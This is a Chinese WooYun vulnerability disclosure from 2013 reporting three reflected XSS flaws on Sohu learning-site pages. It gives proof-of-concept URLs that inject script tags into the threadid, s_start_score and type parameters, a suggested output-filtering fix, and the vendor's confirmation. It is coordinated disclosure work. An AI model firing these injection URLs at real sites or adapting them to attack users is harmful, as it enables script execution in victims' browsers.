当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028678

漏洞标题:[起航01]搜狐多处XSS跨站攻击

相关厂商:搜狐

漏洞作者: zyymartin

提交时间:2013-07-12 15:49

修复时间:2013-08-26 15:49

公开时间:2013-08-26 15:49

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-12: 细节已通知厂商并且等待厂商处理中
2013-07-12: 厂商已经确认,细节仅向厂商公开
2013-07-22: 细节向核心白帽子及相关领域专家公开
2013-08-01: 细节向普通白帽子公开
2013-08-11: 细节向实习白帽子公开
2013-08-26: 细节向公众公开

简要描述:

[起航01]搜狐多处XSS跨站攻击
有人说过物理学界遍地是黄金,而如今这句话用在搜狐身上也不为过,可不过这个黄金可是要带引号的,若问黄金为何物?[听说过金粒餐吗?就是那个](*^__^*) 嘻嘻开个玩笑,黄金就是漏洞啦!
(Ps.小弟幸幸苦苦编辑好排版好,请审核的大人手下留情)

详细说明:

漏洞页面(1):
http://club.learning.sohu.com/?action=read&forumid=univtop10&threadid=1lo6mzz2lpx&page=1

threadid=1lo6mzz2lpx 存在XSS漏洞


证明页面:

http://club.learning.sohu.com/?action=read&forumid=univtop10&threadid=1lo6mzz%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E2lpx&page=1

XSS/爆源代码
点评:
这样赤果果的吃进去(输入)然后赤果果的拉出来(输出),也太那个啥了吧

9.jpg


---邪恶的分割线---
漏洞页面(2):
http://daxue.learning.sohu.com/college/custom_line.php?s_start_score=400&s_end_score=550&Submit=88952634&select4=88952634&year=88952634&select4=0

s_start_score=400 存在XSS漏洞


证明页面:

http://daxue.learning.sohu.com/college/custom_line.php?s_start_score=40"/><script>alert(/wooyun/)</script>
0&s_end_score=550&Submit=88952634&select4=88952634&year=88952634&select4=0


点评:

输出不经过任何过滤,难怪要被XSS


10.jpg


---邪恶的分割线---
漏洞页面(3):
http://club.learning.sohu.com/?action=list&forumid=joblife&type=all type=all 存在XSS漏洞
证明页面:

http://club.learning.sohu.com/?action=list&forumid=joblife&type=all%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E


点评:
无力吐槽

11.jpg


综上:

几个小小的XSS增加了俺的信心,接下来几天陆续为您带来搜狐漏洞系列

漏洞证明:

证明页面(1):

http://club.learning.sohu.com/?action=read&forumid=univtop10&threadid=1lo6mzz%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E2lpx&page=1

XSS/爆源代码
证明页面(2):

http://daxue.learning.sohu.com/college/custom_line.php?s_start_score=40"/><script>alert(/wooyun/)</script>
0&s_end_score=550&Submit=88952634&select4=88952634&year=88952634&select4=0


证明页面(3):

http://club.learning.sohu.com/?action=list&forumid=joblife&type=all%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

修复方案:

拉肚子要及时吃止泻药,而对于这种吃下去又完整拉出来造成XSS的情况,我想一定是病得不轻了,赶快吃药吧----即在输出的地方过滤<,>,/,(,)等字符

版权声明:转载请注明来源 zyymartin@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-07-12 16:00

厂商回复:

感谢关注。

最新状态:

暂无


漏洞评价:

评论